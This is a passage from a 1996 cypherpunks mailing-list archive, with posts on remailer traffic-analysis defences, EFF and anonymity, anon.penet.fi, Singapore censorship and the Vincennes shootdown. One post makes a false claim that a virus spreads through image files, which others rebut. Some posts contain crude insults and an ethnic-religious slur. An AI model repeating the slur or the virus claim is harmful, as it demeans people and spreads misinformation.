remailer operator would be able to reconstruct the destination.

You can still do a spamming attack by recognizing the destination,
rather than the message: Eve forwards enough messages to remailer R to
flush the target message.  Each of Eves messages is headed to a known
(to Eve) address.  Say the remailer R has a buffer of 10 messages, if
Eve sends 9 messages, 3 to each of remailers R2, R3, and R4.  Eve can
then determine the destination of the target message: the remailer
which gets 4 messages is the destination remailer.

(Here my knowledge of mixmasters workings are wearing thin, but I
believe it does these things, or provides facilities so that the
operators/users can make sure these things happen).

The way that this kind of attack is frustrated is that dummy messages
are created as cover traffic by the remailer, and that at some points
messages can be swallowed by a remailer as junk messages.

Sufficient junk cover traffic would ensure that even with a spamming
attack the destination would not be known immediately because the
attacker can distinguish the target message from the junk.

Ultimately a good way to foil this attack in general is to have each
remailer send a fixed amount of mail to each other remailer in cycles.
No traffic analysis if all remailers get equal traffic.

The only entry point for analysis then is the entry and exit points.
The active spam attack then would be to block, or delay all entry
points into the remailer net, apart from the target message.  The only
messages in the network would then be the spam traffic, and the target
message.  When the target message leaves the net, the Eve knows the
destination.

To hinder this attack, the remailers could generate and mail to
previous users junk mail.  Over a long time, statistical attacks could
perhaps be built on a pair of users who communicated frequently.  The
ultimate solution to this is for the users also to receive fixed
amounts of junk each day.

Starting to sound like similar overheads to a DC net, huh?

Peters other suggestions of adding random diversions sound like
reasonable ways to add another form of cover traffic, and should help
make life harder for the attacker,

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Mon, 2 Sep 1996 05:27:23 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Esther Dyson on Remailers
Message-ID: <3.0b11.32.19960901153719.006f4b00@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just for record, Esther's position is NOT necessarily EFFs. 


At 01:39 PM 9/1/96 -0400, Duncan Frissell wrote:
>At 06:52 AM 9/1/96 -0400, Dave Farber wrote:
>>EFF does not, to my knowledge, (and I am a Board Member) have an
>>organizational view on this issue. There are a lot of different views and
>>each member of EFF has their own view that they can and will state as
>>private people. The tendency of the Press to label people with organizations
>>affiliation ship gives the impression of organizational views. For example I
>>certainly don't speak for the University of Pennsylvania when I say thing to
>>the newspapers.
>>
>>Dave
>>
>
>
>At CFP in '95 in SF, Esther expressed the view that there was a place on the
>Net for an anonymous ghetto (my words not hers) where people could be
>anonymous but that most of the net would involve traceability of
>transactions so that people could be held accountable and that businesses
>and individuals would want to know who they were dealing with for payment
>and accountability reasons.
>
>I am not stating her position well I'm sure but it was clear that she
>thought that non-anonymity would be the rule not because it was mandated but
>just because Net actors would want it that way.  A short quote would not
>allow anyone to understand her full position.
>
>If she believes that anonymity would be rejected voluntarily for practical
>reasons then that is just a prediction of a market not a conclusion.  Most
>on this list would have no objection to making a prediction though we might
>disagree with it.
>
>Just as Esther predicted that the net would end copyright, we might predict
>that the net combined with immediate settlement payment systems might reduce
>if not eliminate the need for "positive ID."  
>
>DCF
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 2 Sep 1996 02:07:17 +0800
To: cypherpunks@toad.com
Subject: Beta Scam
Message-ID: <199609011609.QAA18242@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.economist.com/issue/31-08-96/wb1.html 
 
 
Beware Geeks bearing gifts 
 
 
 The Internet is well known as a pioneer when it comes to technology. Less
noticed is its role 
 on the cutting edge of management fashion. Nowadays, it is fashionable for
firms to 
 "outsource" product development to just about everybody. Leading Internet
firms have 
 developed this method a stage further: they have found an outside supplier
so keen to tender 
 his services that he is sometimes willing to pay for the privilege. The
name of this fool? The 
 consumer. [More on beta-scamming at the URL.] 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Sep 1996 09:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <19960830.170609.9758.0.patrickbc@juno.com>
Message-ID: <o7eLTD41w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


patrickbc@juno.com (patrick b cummings) writes:

> jimbell,
> I agree with what you are saying but not all polititions are that bad.
> You make it sound as if their are no politisions are for freedom of the
> net.

But of course - all politicians are scum.  No decent person would want to
be a politician.  Anyone who's willing to become a politician is scum.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 2 Sep 1996 06:26:49 +0800
To: cypherpunks@toad.com
Subject: Re: It is good that anon.penet.fi has been closed!
In-Reply-To: <199609011733.MAA31382@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.960901161500.520A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> Yes, subject says it all. anon.penet.fi was a whole lot worse than
> cypherpunks remailers. It provided clueless users with no real security,
> because it stored return addresses and did not use chaining and
> encryption.

It also provided anonymity to many people who needed it.  I think that many
people who need anonymity will probably just learn faking mail and news
headers.  Many people just don't want to deal with cpunk remailers.  OTOH, I
agree that this might actually force many people with Penet addresses to learn
about more secure remailers.  In this way, the closing of anon.penet.fi could
be looked upon as a Good Thing.  However, as long as there is no easy way for
Windoze and Mac users to use secure remailers, users will sooner resort to
fake-mailing then learning how to use cpunk remailers.  People that need a
pseudonym address to use on various support groups can get them from other,
equally insecure, remailers.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMinwTizIPc7jvyFpAQFpGAf/ZGEXRU7MuROtatlHoAIdaJfIiwig1oDr
fwlNjRe7f1ze8dwUuh74nWFt/ofPtjwSUtpCa1xDgTptPPhzr1I6beOdjwONlUzf
MVif+wnzyIp27V/DCjebAMxQc2avmYKM6mwcOKfzFwG0cfvf/walJrjmADR9K0oe
EXqi7mJzY1rI08Dsw8aHXNj8maDy9pRTSz9O9e0qZTdFlQtFyVNM6PSfAnKR9e1L
ebQ5Yx4qNkgkfhDZgacKNv2inkyuD1LsyQneiCIZ0obhhRL7ORU63wGgYlvqc3gx
Ux8sK2mMo6kr2dvA07nRyLzl3w9vm6efrFJeZC94fjdBYxluFg6/ag==
=+Qm6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnny Eriksson <bygg@sunet.se>
Date: Mon, 2 Sep 1996 00:38:39 +0800
To: paul@fatmans.demon.co.uk
Subject: RE: Desubscribe
Message-ID: <CMM.0.88.841588815.bygg@sunic.sunet.se>
MIME-Version: 1.0
Content-Type: text/plain


> Whoever uses the term "spam" in a non-derogratory manor is an 
> arsehole and deserves to be shipped to sweden where they shall be 
> made into cheese by nuns.

No thanks, we do not want them.

--Johnny

"A government that fears its citizens -- should"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 07:38:52 +0800
To: markm@voicenet.com (Mark M.)
Subject: Re: Moscowchannel.com hack
In-Reply-To: <Pine.LNX.3.95.960901141631.186B-100000@gak>
Message-ID: <199609012149.QAA00600@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Mark M. wrote:
> > A hacker who has root can forcibly unmount the cdrom and mount another
> > directory on that node. Not a good solution.
> 
> As soon as the sysadmin finds out, said directory can be unmounted and CD-ROM
> device can be remounted.  Besides, if someone manages to get root access on any
> machine, the sysadmin of that machine is basically screwed anyway.  It's much
> better than having to back up the web page on a tape and having to restore the
> data when it is altered.

It depends on the ratio 

   R = (frequency of legit Web page changes) / (frequency of breakins 
                                                * cost of a breakin).

The lower is R, the more what you say makes sense. I suspect that 
in the real world R is rather high.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Mon, 2 Sep 1996 11:11:50 +0800
To: "James A. Donald" <bygg@sunet.se
Subject: RE: Desubscribe
In-Reply-To: <199609011607.JAA22532@dns1.noc.best.net>
Message-ID: <v03007803ae4fcff247f2@[17.219.103.198]>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com>, writes:
>I heard on talk.politics.guns somebody say that in Sweden they
>had banned knives with a sharp point at the end, and were going
>to ban sharp knives altogether.  I think he was just engaging in
>hyperbole, that he really meant that gun control in Sweden was
>unreasonably strict, but on reflection I am not sure.
>

In a survey conducted in Sweden a few years ago, 50% of Swedish
households had access to guns (generally military service weapons
and sporting shotguns). Guns are, however, licensed and regulated,
and seldom used in crimes. Licenses for "personal protection" are
almost unobtainable. At least one military officer was court martialed
when his service revolver was stolen from his automobile.

The most significant "mass murderer" crimes in Sweden (one last
year and one in the 1970's) were caused by people who used their
legally-obtained military weapons.

Martin Minow (ex-resident of Sweden)
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 08:11:15 +0800
To: cypherpunks@toad.com
Subject: Re: It is good that anon.penet.fi has been closed!
In-Reply-To: <Pine.LNX.3.95.960901161500.520A-100000@gak>
Message-ID: <199609012217.RAA00801@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Mark M. wrote:
> On Sun, 1 Sep 1996, Igor Chudov @ home wrote:
> > Yes, subject says it all. anon.penet.fi was a whole lot worse than
> > cypherpunks remailers. It provided clueless users with no real security,
> 
> It also provided anonymity to many people who needed it.  I think that many
> people who need anonymity will probably just learn faking mail and news
> headers.  Many people just don't want to deal with cpunk remailers.  OTOH, I
> agree that this might actually force many people with Penet addresses to learn
> about more secure remailers.  In this way, the closing of anon.penet.fi could
> be looked upon as a Good Thing.  However, as long as there is no easy way for
> Windoze and Mac users to use secure remailers, users will sooner resort to
> fake-mailing then learning how to use cpunk remailers.  People that need a
> pseudonym address to use on various support groups can get them from other,
> equally insecure, remailers.

I believe that Private Idaho is a cypherpunks remailer client for Windows.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Mon, 2 Sep 1996 10:27:10 +0800
To: cypherpunks@toad.com
Subject: Re: FW: get me off of this list!!!!!
Message-ID: <199609020042.RAA12094@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>>><porsche@themall.net> wrote:
>>>I need to be taken off of this list but I can't remeber the code 
>>>
>>>to desubscribe.  Can anyone tell me what the code is?
>>>-------------------------------------
>>
>>What's the frequency Herbert?
>>
>>Help, I've fallen and I can't remeber the code.
>>
>>Hint: Try consulting "The Codebreakers."
>
>I guess he deleted that all important message he got when he
>  duhscribed.
>
>it went something like this...
>Welcome to the cypherpunks mailing list!
> 
>[...]
>If you ever want to remove yourself from this mailing list,
> 
>[...]
>(and wanting to get off the list is never an emergency)
> 
>[...]
>Do not mail to the whole list asking to be removed.  It's rude.
>
>[...]
>

--
------------------------------------------
There are no facts, only interpretations.
  
I always wanted to be somebody, but I should have been more specific.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Mon, 2 Sep 1996 10:41:29 +0800
To: kickboxer <charlee@netnet.net>
Subject: Re: HAZ-MAT virus
In-Reply-To: <199609012319.SAA18515@netnet1.netnet.net>
Message-ID: <Pine.3.89.9609011737.A19751-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain



First, the HAZ-MAT is a polymorphic virus. It is not run by any data file 
(GIF, JPG or otherwise).

Second. I had a private message sentto me from someone who suffered at 
the hands of this virus and described the effects. From the description 
it indicates the use of a possible boot or hidden sector residency with 
low level ATA-3 command capability to zap IDE drives. This is nothing 
new, or magical. 

Third. The HAZ-MAT virus has been documented to have been transported via 
a rogue copy of EudoraPro in zip format, plus one other EXE (non-image 
application).

This is not spam, just facts...

On Sun, 1 Sep 1996, kickboxer wrote:

> I do not know how it is run by the JPG and GIF files, but I do know that the
> code somehow loads into the image viewer itself..I am not sure how it works,
> just that it is very destructive.. I had it destroy my 486 (using Lview Pro)
> Oh, well, ENOUGH already.  if you have something to say that is related to
> "image files cant execute a virus" please do not. there are too many spams
> with those ideas out now
>                                                                                
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 11:09:30 +0800
To: cypherpunks@toad.com
Subject: PLEASE Nuke Singapore Back into the Stone Age
Message-ID: <ae4f7c3101021004e2e2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 9/1/96, James Seng wrote:

>To understand the sitution better, you should not impose America
>idealogy and perspection on how things to be done to Singapore. Singapore
>maybe young but there are certain culture too.

Who says this has anything to do with "American ideology"? The Usenet is
propagated around the world. All we are saying is that honest commentary on
the corruption of Lee Kwan Yew (and his billion dollars in Australian and
European banks) will be reported on the Usenet.

This is not "imposing American ideology" on anyone. Singapore, being the
dynastic dictatorship that it is, may decide to block access all newsgroups
which discuss Yew's tyranny, or pornography, or pro-Malay sentiment, or
anything else banned in the Benevolent Republic of Singapore. This will be
their choice, to ban access by citizen-units to Evil Thoughts.

It is not an issue of "imposing American ideology" on the helpless in
Singapore, any more than a book or magazine is "imposing" an ideology.

It sounds to me, James, that you need to get out of Singapore and visit a
country where free speech and free ability to read material is not treated
as "imposed foreign ideologies." (I think you also need to look up what
"imposed" means. The "Wired" magazine banned in Singapore is not something
that is ever "imposed" on others....anyone is free to simply not read the
magazine!)

>is Singapore. As an example of what i mean, few years back, when they
>introduced R rating movies uncensored in Singapore for people above 18,
>it cause a surge in soft-porn movie to be screened. There is a general

So? Your point being? After all, nobody is forcing _you_ to go watch these
R-rated movies. You are free to not watch if you find them offensive. In a
free society this is how things work.

I think you'll find this mailing list anathema to your apparent ideology.

...
>Singapore culture. Do not impose the general idealogy and culture within
>your country into your argument. (Oh yea, dont give me the "Bull shit!
...
>Now, what makes you think that citizen of Country A has the power or
>rights to tell politicians of Country B what to do and what they cannot do?
>Just wondering.

Again, you really need to look up the meaning of "impose" more carefully.
By posting a comment about how Singapore sucks, or how Lee Kwan Yew raped
his country and deposited his profits in Australian and European banks,
just what am I "imposing" on Singaporans or anyone else?

I think you have little understanding of how the global Internet works.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Mon, 2 Sep 1996 10:53:03 +0800
To: edyson@edventure.com (Esther Dyson)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <199609020056.RAA15989@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Ms. Dyson:

As a result of my knowing something of your work and additionally having
viewed your highly impressive performance on Bill Buckley's CDA debate
program, I used to think a great deal of you.  And, as a matter of fact, I
suppose that I still do.

I am frankly troubled, however, by my _impression_ of your beliefs in the
abovereferenced matter.  Perhaps I have misunderstood your recent post to
Cypherpunks; indeed, I am certain that all will be elucidated after you have
had an opportunity to review more fully the article in question.

I look forward to reading your further thoughts.

Sincerely,

-David M. Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edyson@edventure.com (Esther Dyson)
Date: Mon, 2 Sep 1996 08:04:19 +0800
To: Dave Farber <eff-staff@eff.org
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <19960901220323595.AAA208@Esther.edventure.com>
MIME-Version: 1.0
Content-Type: text/plain


Before going into the merits of this, let me make two points: 

One I specifically asked the reporter (Amy Harmon) to quote me as an
individual, not as a spokesperson for the EFF.  (It was Amy Harmon, and the
only address I have for her bounces, but as you can imagine I would like to
get in touch with her!  Anyone know it?)  These are my personal views; EFF
has no formal policy on this yet -- precisely because it's a complex issue.

Now, speaking personally: I believe there are trade-offs -- which is what I
told the LA Times.  I assume I was quoted accurately (although the word
"enforce" is awkward), but out of context.   Anonymity can be dangerous --
as can traceability, especially in/by repressive regimes.  Therefore I would
favor allowing anonymity -- with some form of traceability only under terms
considerably stronger than what are generally required for a wiretap.
Anyone who seriously needs anonymity because of a repressive government is
likely to use a foreign (outside whatever jurisdiction he fears) server, so
that this is not a matter of "local" laws.  The tracer would have to pass
through what I hope would be tighter hoops than we have now.  

Please note that this is not the same as the right to *private*
conversations and the use of encryption; this is the issue of being
accountable for what you publish in public.  

My assumption is that there will be a wide variety of Net communities with
different rules/regulations/attitudes towards anonymity that would apply ex
some kind of international sanctions; I think that's appropriate.  

Yes, I'm aware of the complexities, and of the possibilities for
miscarriages of justice.  The world isn't yet the way I want it to be.  But
I wanted to respond reasonably promptly.  

BTW, I would welcome a chance to read the whole article (or at least a
*little* more of the context, under fair use).
 
Speaking for myself, only (and publicly),
Esther Dyson


        
At 06:40 AM 9/1/96 -0400, Dave Farber wrote:
>>Posted-Date: Sun, 1 Sep 1996 14:59:53 +1000 (EST)
>>Date: Sun, 1 Sep 1996 14:59:53 +1000 (EST)
>>From: Charles Senescall <apache@quux.apana.org.au>
>>To: cypherpunks@toad.com
>>Cc: declan@well.com
>>Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
>>Sender: owner-cypherpunks@toad.com
>>
>>On Sat, 31 Aug 1996, Declan McCullagh wrote:
>>
>>> The attached article was reposted to fight-censorship with the permission
>>> of the Los Angeles Times, which ran it on the front page today. 
>>[snip]
>>> Note Esther Dyson's comments:
>>> 
>>>          "The damage that can be done by anonymity is far bigger" than in
>>>    any other medium, said Esther Dyson, chairwoman of the Electronic
>>>    Frontier Foundation. "In the end, you need to be able to get at
>>>    somebody's identity to enforce accountability, and the question is how
>>>    do you also enforce freedom of speech and freedom from prosecution for
>>>    unpopular opinions."
>>
>>Is this _really_ the EFF policy on anonymopus remailers??
>>
>>I will check with our local version of the EFF and see what they have to say.
>>
>>If the EFF is not for anonymity it needs to be publicised. Perhaps the 
>>EFF has been in bed with the political pigs too long. *OINK*
>>
>>-- 
>>   .////.   .//    Charles Senescall            apache@quux.apana.org.au
>> o:::::::::///     Fuck TEL$TRA                    
>>>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
>>   '\\\\\'   \\    <A HREF="http://quux.apana.org.au/~apache/"> 
>>
>>
>>
>>
>
>

Esther Dyson				Always make new mistakes!
EDventure Holdings
<edyson@edventure.com> 
1 (212) 924-8800
1 (212) 924-0240 fax
104 Fifth Avenue
New York, NY 10011 USA 
www.edventure.com
High-Tech Forum in Lisbon, October 27-29, 1996
PC Forum in Tucson, Arizona, March 23-26, 1997





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Mon, 2 Sep 1996 09:22:43 +0800
To: cypherpunks@toad.com
Subject: HAZ-MAT virus
Message-ID: <199609012319.SAA18515@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


I do not know how it is run by the JPG and GIF files, but I do know that the
code somehow loads into the image viewer itself..I am not sure how it works,
just that it is very destructive.. I had it destroy my 486 (using Lview Pro)
Oh, well, ENOUGH already.  if you have something to say that is related to
"image files cant execute a virus" please do not. there are too many spams
with those ideas out now
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 2 Sep 1996 04:43:58 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: WARNING vIRuS!
Message-ID: <199609011900.NAA07748@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
        kickboxer is full of shit  --or trolling.
 
        since when can a jpeg or gif file viewer execute anything
    --nothing starts automatically, in any operating system.
    that is expecting a jump call of some sort.  we haven't yet 
    fallen into the impending insecure abyss of MS objects.
 
        to have a piece of code embedded execute, a "start-up" 
    program would need to be previously passed to the target 
    machine which literally scanned all memory for the startup
    sequence in the foreign material --and translate it.
 
        on unix, the code would need to be sophisticated enough 
    to remove itself from the process table --even in sleep
    modes.
 
        and, in any system, the startup sequence must be 
    readable, and therefore traceable by anti-virus routines.

        now that kickboxed has baited the hook for trolling, what
    new wet dream will we have for rebuttals?!?

On Sat, 31 Aug 1996, kickboxer wrote:

>         There is a new and VERY dangerous virus called the HAZ-MAT virus!
> it fucks up the sectors on your hd, and really messes up the partition
> tables.  It does this once a week, picking a random time to do it.  99.9% of
> virus scanners and other antivirus programs will not recognize it, for it is
> a totally new strain, using a never before seen code.... Be warned!  The
> HAZ-MAT virus usually resides in JPG, and GIF files... once the files are
> viewed, the virus takes effect.
> scan all images upon download!
>                                                                                
> 
> 



--
you can fool all of the people some of the time,
  you can fool some of the people all the time,
    but you can not fool all the people all the time.
        --Lincoln?

cc: Paul Penrod <ppenrod@earthlink.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 09:22:46 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960831.181353.9134.9.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


need more hackers for the list please send following info to me
    handle
    e-mail address
    P.O. Box
    url
    type of hacking you do




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 2 Sep 1996 09:22:48 +0800
To: tcmay@got.net
Subject: Re: "Security risks" vs. "credit risks"
Message-ID: <01I8Z52F4F5S9JDHU2@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	According to the WaP article, the database in question would be
_required_ by the federal government... thus removing any voluntary aspect
of it, so long as you want to fly on a plane.
	I have had the thought that it might be possible for an air cargo
business to have as a stock benefit a guarantee that, for payment of any
extra costs, any stockholder could ride on one of their planes. I don't know
how the laws on the subject are worded, but I believe that a lot of restrictions
are removed for planes other than standard passenger airlines. This might be a
way to fly anonymously - Chaumian "is-a-stockholder" credidentials might be
usable to arrange it (the local library's copy of Applied Cryptography is
checked out, so I don't know for sure) anonymously.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Synthesizer Punk <lucas@wasteland.org>
Date: Sun, 1 Sep 1996 09:30:49 +0800
To: patrick b cummings <patrickbc@juno.com>
Subject: Re: your mail
In-Reply-To: <19960830.174816.9758.3.patrickbc@juno.com>
Message-ID: <Pine.LNX.3.95.960901192944.6602A-100000@wrath.netline.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, patrick b cummings wrote:

:I am planning to make a list of hacker's of america and would appreciate
:it for your help.  please send me your 
:    handle
:    e-mail address
:    city, state
:    (optional) your mailing address 
:    and url
:    whether or not you would like to recieve hackers list
:    type of hacking you do
:Thank You for your cooperation
:
:
:
	May I ask, ill fatedly, WHY you're doing this?
	What goals you wish to accomplish by doing this?
	How many friends will you make?
	Will you go to Disney World when done?

	sigh

                      __  .__https://aleph.tessier.com__   lucas@wasteland.org
  _________.__. _____/  |_|  |__ ______  __ __  ____ |  | __   If privay is 
 /  ___<   |  |/    \   __\  |  \\____ \|  |  \/    \|  |/ /  outlawed, only
 \___ \ \___  |   |  \  | |   Y  \  |_> >  |  /   |  \    <    outlaws will
/____  >/ ____|___|  /__| |___|  /   __/|____/|___|  /__|_ >   have privacy.
     \/ \/ sXe sXe \/          \/|__| figlet       \/just Another P.C. Fascist
           Tessier/Ashpool_-//-..()_=+www(ashpool/tessier).com.-+|\






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Date: Mon, 2 Sep 1996 10:02:16 +0800
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.Afe5+nwV8mB@mstrinet.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            
Subject:       Re: It is good that anon.penet.fi has been closed!

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINED-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> Yes, subject says it all. anon.penet.fi was a whole lot worse than
> cypherpunks remailers. It provided clueless users with no real security,
> because it stored return addresses and did not use chaining and
> encryption.

It also provided anonymity to many people who needed it.  I think that many
people who need anonymity will probably just learn faking mail and news
headers.  Many people just don't want to deal with cpunk remailers.  OTOH, I
agree that this might actually force many people with Penet addresses to learn
about more secure remailers.  In this way, the closing of anon.penet.fi could
be looked upon as a Good Thing.  However, as long as there is no easy way for
Windoze and Mac users to use secure remailers, users will sooner resort to
fake-mailing then learning how to use cpunk remailers.  People that need a
pseudonym address to use on various support groups can get them from other,
equally insecure, remailers.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMinwTizIPc7jvyFpAQFpGAf/ZGEXRU7MuROtatlHoAIdaJfIiwig1oDr
fwlNjRe7f1ze8dwUuh74nWFt/ofPtjwSUtpCa1xDgTptPPhzr1I6beOdjwONlUzf
MVif+wnzyIp27V/DCjebAMxQc2avmYKM6mwcOKfzFwG0cfvf/walJrjmADR9K0oe
EXqi7mJzY1rI08Dsw8aHXNj8maDy9pRTSz9O9e0qZTdFlQtFyVNM6PSfAnKR9e1L
ebQ5Yx4qNkgkfhDZgacKNv2inkyuD1LsyQneiCIZ0obhhRL7ORU63wGgYlvqc3gx
Ux8sK2mMo6kr2dvA07nRyLzl3w9vm6efrFJeZC94fjdBYxluFg6/ag==
=+Qm6
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 13:23:28 +0800
To: cypherpunks@toad.com
Subject: American Imperialism, Firing Squads, and the Vincennes Shootdown
Message-ID: <ae4f950802021004b956@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:03 AM 9/2/96, Alan Horowitz wrote:
>The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
>
>If my memory serves, the Iranian jetliner had its squawker turned off, or
>broken. The officer in charge in the CIC had about ten seconds to decide
>if he was about to be locked-on by a missle. And no real information to
>make the decision with.

The U.S.S. Vincennes shot down an Iranian commercial airliner that was in
its normal and well-known flight path out of Bandar Abbas. That the U.S.
felt it was in a "war zone" was due to American imperialistic sentiments
that say the U.S. can and should send its police forces to distant parts of
the globe, even inside the Persian Gulf, no more than a few dozen miles
from Iranian shores. (And the godless Jew Persians had the audacity to
patrol its shorelines with gunboats! Jeesh. I'm sure the U.S. would not
send the Coast Guard out to investigate or harass foreign warships cruising
inside Chesapeake Bay, San Francisco Bay, or other coastal bays and
inlets.)

As to the "squawker" being turned off, this is not my recollection of the
case (though it was nearly a decade ago, so memories fade...).

(I just did an Alta Vista search to refresh my memory. Found this choice
description:

" Anderson's job in "Air Alley," the row of operators who handled air
warfare, was to identify any air traffic within range of the ship. He told
the Aegis system to query the incoming plane: Identify, Friend or Foe? By
standard practice, all planes carry a transponder that automatically
answers
the IFF query with Mode 1 or 2 (military), or Mode 3 (civilian). Anderson
got a Mode 3. "Commair" (commercial airliner), he figured. He reached
beside
his console for the navy's listing of commercial flights over the gulf. But
as he scanned the schedule, he missed Flight 655. Apparently, in the
darkness of
the CIC, its arc lights flickering every time the Vincennes's five-inch gun
fired off another round at the hapless Iranian gunboats, he was confused by
the
gulf's four different time zones."
[http://www.waite.adelaide.edu.au/~aranjbar/Ali/pol/4]

So, the Iranian jet's IFF module _was_ working...the U.S. ship just missed it.

Fact is, the U.S. shot down a commercial airliner which was in its normal
flight path! One can imagine the repercussions if TWA 800 was similarly
shot down as it followed its ordinary flight path.

The U.S. demanded sanctions against the Soviets in '83 for shooting down a
Korean airliner which had strayed (maybe) deep into Soviet airspace and
which refused to acknowledge several radio messages.

Though I am no apologist for the Soviets, which event was the more
egregious? That the U.S. demanded actions against the Sovs, but pooh-poohed
and whitewashed the Iranian airliner shootdown, is evidence of
imperialistic hypocrisy.

